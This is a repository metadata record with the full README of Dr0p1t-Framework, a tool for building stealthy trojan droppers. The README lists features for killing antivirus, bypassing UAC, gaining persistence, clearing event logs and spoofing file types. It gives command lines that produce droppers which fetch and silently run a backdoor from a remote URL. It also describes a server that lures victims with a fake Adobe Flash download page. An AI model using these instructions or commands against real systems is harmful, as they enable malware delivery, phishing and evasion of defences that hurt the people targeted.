{"id":13539767,"url":"https://github.com/d4vinci/dr0p1t-framework","last_synced_at":"2025-10-02T07:30:33.589Z","repository":{"id":40499512,"uuid":"81683268","full_name":"D4Vinci/Dr0p1t-Framework","owner":"D4Vinci","description":"A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks","archived":true,"fork":false,"pushed_at":"2018-11-03T19:00:12.000Z","size":7634,"stargazers_count":1422,"open_issues_count":5,"forks_count":381,"subscribers_count":109,"default_branch":"master","last_synced_at":"2025-09-19T07:14:42.252Z","etag":null,"topics":["anti-forensics","avs","backdoor","dr0p1t","execution-policy-bypass","hacking","hacking-tool","kali-linux","kill-antivirus","malware","pentest","persistence","phishing","powershell","runas","scam","social-engineering","spoofing","uac-bypass","windows-hacking"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D4Vinci.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-02-11T21:24:11.000Z","updated_at":"2025-09-17T18:43:29.000Z","dependencies_parsed_at":"2022-07-13T07:50:54.606Z","dependency_job_id":null,"html_url":"https://github.com/D4Vinci/Dr0p1t-Framework","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/D4Vinci/Dr0p1t-Framework","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories
/D4Vinci%2FDr0p1t-Framework/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D4Vinci","download_url":"https://codeload.github.com/D4Vinci/Dr0p1t-Framework/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D4Vinci%2FDr0p1t-Framework/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":277974403,"owners_count":25908396,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-02T02:00:08.890Z","response_time":67,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["anti-forensics","avs","backdoor","dr0p1t","execution-policy-bypass","hacking","hacking-tool","kali-linux","kill-antivirus","malware","pentest","persistence","phishing","powershell","runas","scam","social-engineering","spoofing","uac-bypass","windows-hacking"],"created_at":"2024-08-01T09:01:31.637Z","updated_at":"2025-10-02T07:30:33.157Z","avatar_url":"https://github.com/D4Vinci.png","language":"Python","funding_links":["https://buymeacoffee.com/d4vinci"],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca 
id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"ad92f6b801a18934f1971e2512f5ae4f\"\u003e\u003c/a\u003ePayload生成"],"readme":"# Not maintained currently (Wait for the next version)\n-----\n# Dr0p1t-Framework [![n0where best cybersecurity tools](https://img.shields.io/badge/25-n0where%20best%20cybersecurity%20tools-red.svg)](https://n0where.net/best-cybersecurity-tools) [![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) ![Build Status](https://img.shields.io/badge/Version-1.3.2.1-red.svg)\n\nHave you ever heard about trojan droppers?\nIn short, a dropper is a type of malware that downloads other malware, and Dr0p1t gives you the chance to create a stealthy dropper that bypasses most AVs and has a lot of tricks ( Trust me :D ) ;)\n\n# Features\n**+ Generated executable properties:**\n- The executable size is smaller compared to other droppers generated the same way.\n- Download executable on target system and execute it silently.\n- Self destruct function so that the dropper will kill and delete itself after finishing its work\n- Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion\n- Clear event log after finishing.\n\n**+ Framework properties:**\n- Works with Windows, Linux and now has OSX support ( Thanks to @sm4sh3r )\n- Dr0p1t-Server feature (beta) so now you can work from browser [See how to work with Dr0p1t-Server](#work-with-dr0p1t-server)\n- Dr0p1t-Server has a scam option (beta) [See how to work with Dr0p1t-Server](#work-with-dr0p1t-server)\n\n**+ Modules:**\n- Find and kill antivirus before running the malware.\n- The ability to disable UAC.\n- The ability to run your malware as admin.\n- Full spoof by spoofing the file icon and extension to anything you want.\n- ZIP files support so now you 
can compress your executable to a zip file before uploading.\n- Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable\n- When running PowerShell scripts, it can bypass the execution policy\n- Using UPX to compress the dropper after creating it\n\n**+ Persistence modules:**\n- Adding executable after downloading it to startup.\n- Adding executable after downloading it to task scheduler ( UAC does not matter ).\n- Adding your file to powershell user profile so your file will be downloaded and run every time powershell.exe runs if it doesn't exist.\n\n# Screenshots\n## On Windows\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows/WinTest-1.JPG\" width=\"100%\"\u003e\u003c/img\u003e\n\n[See more](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows)\n\n## On Linux (Kali Linux)\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxTest-1.png\" width=\"100%\"\u003e\u003c/img\u003e\n\n[See more](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux)\n\n## On OSX\nStill not fully tested! Need some contributors and testers :smile:\n\n### Help menu\n```\nUsage: Dr0p1t.py Malware_Url [Options]\n\noptions:\n-h, --help      show this help message and exit\n-s              Add your malware to startup (Persistence)\n-t              Add your malware to task scheduler (Persistence)\n-a              Add your link to powershell user profile (Persistence)\n-k              Kill antivirus process before running your malware.\n-b              Run this batch script before running your malware. Check scripts folder\n-p              Run this powershell script before running your malware. Check scripts folder\n-v              Run this vbs script before running your malware. 
Check scripts folder\n--runas         Bypass UAC and run your malware as admin\n--spoof         Spoof the final file to an extension you choose.\n--zip           Tell Dr0p1t that the malware in the link is compressed as zip\n--upx           Use UPX to compress the final file.\n--nouac         Try to disable UAC on victim device\n-i              Use icon to the final file. Check icons folder.\n--noclearevent  Tell the framework to not clear the event logs on target machine after finish.\n--nocompile     Tell the framework to not compile the final file.\n--only32        Download your malware for 32 bit devices only\n--only64        Download your malware for 64 bit devices only\n-q              Stay quite ( no banner )\n-u              Check for updates\n-nd             Display less output information\n```\n### Examples\n```\n./Dr0p1t.py Malware_Url [Options]\n./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx\n./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32\n./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas\n./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip\n```\n# Prerequisites\n- Python 2 or Python 3.\n\n\u003eThe recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller\n\n### Needed dependencies for Linux\n- apt\n- Others will be installed from install.sh file\n\n\u003eNote : You must have root access\n\n### Needed dependencies for windows\n- pip\n- Modules in windows_requirements.txt\n\n# Installation\n\u003eThere's a list here for all official videos for installing and using Dr0p1t [Playlist](https://www.youtube.com/playlist?list=PLn3wMo250kMb1w7W7sUcQi6smA77V2men)\n- On Linux\n```\ngit clone https://github.com/D4Vinci/Dr0p1t-Framework.git\nchmod 777 -R Dr0p1t-Framework\ncd Dr0p1t-Framework\nsudo chmod +x install.sh\n./install.sh\npython 
Dr0p1t.py\n```\n\n- On Windows (after downloading the ZIP and unzipping it)\n```\ncd Dr0p1t-Framework-master\npython -m pip install -r windows_requirements.txt\npython Dr0p1t.py\n```\n\u003eNote: in Python 2.7 you don't have pip, so install it first using the get-pip.py script [Google it]\n\n### Tested on:\n\n- Kali Linux Rolling\n- Ubuntu 14.04-16.04 LTS\n- Windows 10/8.1/8\n\n# Work with Dr0p1t-Server\n\u003eNote: The server is still in beta and it has a lot of features to add and also a better design [ Need a designer to contribute :D ]\n\n## Prerequisites\n- Stable internet connection.\n- Port 5000 not in use and the firewall configured not to block connections from it\n\n## Installation \u0026 run server\nThe steps are the same on Linux and Windows: after installing Dr0p1t as described above, install the modules in server_requirements.txt using pip:\n\n```\npython -m pip install -r server_requirements.txt\n```\nNow let's run our server script:\n\n```\npython Dr0p1t_Server.py\n```\nAfter running the server script, it will start listening for all connections coming to port 5000 using Flask.\n\nNow, to use the server from your device, open either 127.0.0.1:5000 or [Your IP]:5000 in a browser.\n\nTo open it from other devices in the LAN, open [Your Local IP]:5000, and for other devices in the WAN open [Your Global IP]:5000, but first make sure that you configured your router to forward port 5000 connections to you.\n\nAfter opening the server page you will see a simple website with a simple design asking you for the data needed [See server screenshots](#server-screenshots)\n\nThen submit the data; it will be verified through some processes, the exe file will be generated, and you will be redirected to a page telling you the scam link.\n\nAfter entering the link you will see a scam to download the dropper, which is by default an Adobe Flash download page.\nTo replace the scam with yours, replace the content of the file \"Scam.html\" with yours but remember the variables ( Don't remove them 
).\n\n## Server screenshots\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-1.png\" width=\"100%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-2.png\" width=\"100%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-3.png\" width=\"100%\"\u003e\u003c/img\u003e\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux/LinuxServerTest-4.png\" width=\"100%\"\u003e\u003c/img\u003e\n\n[See more for Windows](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Windows)\n[See more for Linux](https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/Linux)\n\n# No distribute scan ( Please don't scan with virus total:3 )\n\u003cimg src=\"https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/Screenshots/nodistribute_scan.png\" width=\"100%\"\u003e\u003c/img\u003e\n\n## Todo [Check out this link](https://github.com/D4Vinci/Dr0p1t-Framework/projects/1)\n\n## Contact\n- [Twitter](https://twitter.com/D4Vinci1)\n\n## Donation\nIf this tool has been useful for you, feel free to thank me by buying me a coffee :)\n\n[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoffee.com/d4vinci)\n\n## Disclaimer\nDr0p1t Framework is not responsible for misuse or illegal purposes. 
Use it only for pentesting or educational purposes!!!\n\nCopying code from this framework or using it in another tool is accepted as long as you mention where you got it from :smile:\n\n\u003e Pull requests are always welcome :D\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4vinci%2Fdr0p1t-framework","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd4vinci%2Fdr0p1t-framework","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4vinci%2Fdr0p1t-framework/lists"}